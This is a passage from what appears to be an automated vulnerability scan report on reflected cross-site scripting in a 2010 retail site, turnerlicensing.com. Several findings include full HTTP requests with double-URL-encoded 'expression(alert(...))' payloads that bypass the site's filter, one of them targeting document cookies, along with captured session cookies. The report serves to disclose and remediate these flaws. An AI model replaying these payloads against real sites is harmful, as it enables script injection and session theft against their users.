GET /3_ring_binders?83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:15 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1666335954:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=861
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76372


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>3-Ring Binders</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175952&83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1&83686'style='x:expression(alert(1))'31528bb40bd=1&fromsla=T&83686%27style%3d%27x%3aexpression%28alert%281%29%29%2731528bb40bd=1'>
...[SNIP]...

1.6. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /3_subject_notebooks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f63ec'style='x:expression(alert(1))'5164698b3fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /3_subject_notebooks?f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:19 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114181783:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=963
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99744


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>3 Subject Notebooks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262132&f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1&f63ec'style='x:expression(alert(1))'5164698b3fe=1&f63ec%27style%3d%27x%3aexpression%28alert%281%29%29%275164698b3fe=1&fromsla=T'>
...[SNIP]...

1.7. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /5x8_notepads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bbd7'style='x:expression(alert(1))'3ded6a6acc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5x8_notepads?1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:21 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1558082987:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=967
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100309


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>5x8 Notepads</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175950&1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1&1bbd7'style='x:expression(alert(1))'3ded6a6acc=1&1bbd7%27style%3d%27x%3aexpression%28alert%281%29%29%273ded6a6acc=1&fromsla=T'>
...[SNIP]...

1.8. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /5x8_planners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dec49'style='x:expression(alert(1))'b65b930df92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5x8_planners?dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:20 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1558082685:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100061


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>5x8 Planners</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262138&dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1&fromsla=T&dec49'style='x:expression(alert(1))'b65b930df92=1&dec49%27style%3d%27x%3aexpression%28alert%281%29%29%27b65b930df92=1'>
...[SNIP]...

1.9. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /MLB

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8600f'style='x:expression(alert(1))'40335c5bc15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /MLB?8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:30 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:30 GMT
NS_RTIMER_COMPOSITE: 670284442:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=905
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 57803


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>MLB</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=68&8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1&8600f%27style%3d%27x%3aexpression%28alert%281%29%29%2740335c5bc15=1&8600f'style='x:expression(alert(1))'40335c5bc15=1&fromsla=T'>
...[SNIP]...

1.10. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1530'style='x:expression(alert(1))'b802c6ba968 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA?e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.turnerlicensing.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.turnerlicensing.com
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; JSESSIONID=5FGwMyBPj2G9W1Yp7Zy2vGPjsmpGvTRLK5dLCcGL1LQd27JDFJ2hjzvGZJdq31s19kkgnxsBqmQQqJp7C24sztLlX2QJNz6JFx0xSDXrxwjDszkrLTjK3L22n5n1bXhG!-639703385; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290272924.1290272963.7; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.1.10.1290272963; __utmc=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:57 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:58 GMT
NS_RTIMER_COMPOSITE: -367531585:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JnnzMyKdyxbFsWhzHTc3QhzQf7lJ1pKW7GGN5xtJyC1x8h3RQKWHgXvy2TxRqxsqJZLQ361q6Llxdq9S8Tb2NkJHbZnYvfnLQ5Yd2QMRndHqbXGhYNGqcLPlv55d4yPF!-639703385; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 17:51:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 58118


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NBA</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=69&e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968=1&e1530%27style%3d%27x%3aexpression%28alert%281%29%29%27b802c6ba968=1&e1530'style='x:expression(alert(1))'b802c6ba968=1&fromsla=T'>
...[SNIP]...

1.11. http://www.turnerlicensing.com/NBA/atlanta_hawks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/atlanta_hawks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15c9e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279a17b92c195 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15c9e'style='x:expression(alert(1))'9a17b92c195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/atlanta_hawks?15c9e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279a17b92c195=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:24 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:30 GMT
NS_RTIMER_COMPOSITE: -264711781:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=QdzjMyTF5rWWtnVyh3zWWpfrPgVj1BTV4zQSBs21sDPvd8jJ3T0Zcdx4rK9lX54rWzHtcgdcv1rylv9G1K3VGn1dtd2G0m8Mp9plhzpB2n1XdFDkZtGxKsw2Y7yLpxMJ!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:36 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89372


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Atlanta Hawks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=143971&15c9e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279a17b92c195=1&15c9e'style='x:expression(alert(1))'9a17b92c195=1&fromsla=T&15c9e%27style%3d%27x%3aexpression%28alert%281%29%29%279a17b92c195=1'>
...[SNIP]...

1.12. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/boston_celtics

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7e246%20style%3dx%3aexpression(alert(1))%20ac33b6d3649 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e246 style=x:expression(alert(1)) ac33b6d3649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /NBA/boston_celtics?source=google_content_nba&bce72%2527style%253d%2527x%253aexpression%2528alert%2528document.cookies%2529%2529%2527b0f27be55e7=1&7e246%20style%3dx%3aexpression(alert(1))%20ac33b6d3649=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.turnerlicensing.com
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; __utma=1.2027734133.1289244024.1290263270.1290272830.5; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.1.10.1290272830

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:25:49 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:25:50 GMT
NS_RTIMER_COMPOSITE: -2142940857:73686F702D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=Hd8rMySNyy2R1D6QnvbZG8kdhDd2D62y1gXmfy1YTMBHncgyTk2TnvyS9rfDvnnnphhC81qv022RvQb2JNvy65NcKFwghGFfMJQSCLhQd2BLrd4FMRRGG82JdtJck1Qn!869461051; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:25:52 GMT; path=/
Set-Cookie: NS_VER=2010.2.0; domain=www.turnerlicensing.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 95113


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
3aexpression(alert(1))%20ac33b6d3649=1&7e246 style=x%3Aexpression%28alert%281%29%29+ac33b6d3649%3D1&source=google_content_nba&bce72'style='x:expression(alert(document.cookies))'b0f27be55e7=1&fromsla=T&7e246 style=x:expression(alert(1)) ac33b6d3649=1&bce72%27style%3d%27x%3aexpression%28alert%28document.cookies%29%29%27b0f27be55e7=1'>
...[SNIP]...

1.13. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/boston_celtics

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d38e8'style='x:expression(alert(1))'8d6ba417d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/boston_celtics?d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:08 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:07 GMT
NS_RTIMER_COMPOSITE: 1666333946:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94901


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144026&d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1&d38e8%27style%3d%27x%3aexpression%28alert%281%29%29%278d6ba417d1b=1&d38e8'style='x:expression(alert(1))'8d6ba417d1b=1&fromsla=T'>
...[SNIP]...

1.14. http://www.turnerlicensing.com/NBA/boston_celtics/8010782 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/boston_celtics/8010782

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32b5b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f3631ec12da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32b5b'style='x:expression(alert(1))'f3631ec12da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/boston_celtics/8010782?32b5b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f3631ec12da=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:36:52 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:37:00 GMT
NS_RTIMER_COMPOSITE: 1205197772:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
